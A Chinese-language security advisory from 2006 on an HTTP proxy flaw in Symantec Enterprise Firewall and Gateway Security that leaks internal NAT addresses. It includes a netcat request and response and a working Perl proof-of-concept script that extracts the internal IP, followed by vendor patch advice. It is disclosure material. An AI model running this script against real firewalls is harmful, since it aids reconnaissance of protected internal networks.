首页 -> 安全研究
安全研究
安全漏洞
Symantec Enterprise Firewall/Gateway Security HTTP代理泄露内部IP漏洞
发布日期:2006-05-10
更新日期:2006-05-12
受影响系统:
Symantec Enterprise Firewall 8.0描述:
Symantec Gateway Security 5000 Series 3.0
Symantec Gateway Security 5000 Series 2.0.1
BUGTRAQ ID: 17936
Symantec Enterprise Firewall和Gateway Security都是流行的防火墙系统。
Symantec Enterprise Firewall和Symantec Gateway Security产品的HTTP代理中存在信息泄露漏洞,远程攻击者可能利用此漏洞获取局域网内部IP地址信息。
在响应特制的HTTP请求时:“get/XX HTTP/1.0”(请注意缺失的空格)
防火墙会转发请求并等待Web服务器的回复,直到超时。防火墙的最终响应类似于:
df0rm@b4byl0n:~> netcat www.behind-raptor.com 80
get/01 http/1.0
HTTP/1.1 504 Gateway Timeout
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Tue, 13 Sep 2005 06:23:32 GMT
Connection: close
Content-Type: text/html
[...]
防火墙所看到的请求是:
<tt><ul><li>
http://10.238.94.57/01
这样防火墙就泄露了NAT本应该隐藏的内部地址。
<*来源:Bernhard Mueller (research@sec-consult.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114747623125993&w=2
http://securityresponse.symantec.com/avcenter/security/Content/2006.05.10.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67
use IO::Socket;
$| = 1;
$host = $ARGV[0] or die "$0 <host>\n";
$request = "getXXX/XXX HTTP/1.0\n\n";
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
);
die "could not open socket: $!\n" unless $sock;
print $sock $request;
print "waiting for timeout (this can take about 1 min.)\n";
while (<$sock>) {
if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
$ip = $1;
}
}
if (defined($ip)) {
print "$host: $ip\n";
} else {
print "failed.\n";
}
close($sock);
建议:
厂商补丁:
Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.symantec.com/techsupp/enterprise/select_product_updates.html
浏览次数:3079
严重程度:0(网友投票)
绿盟科技给您安全的保障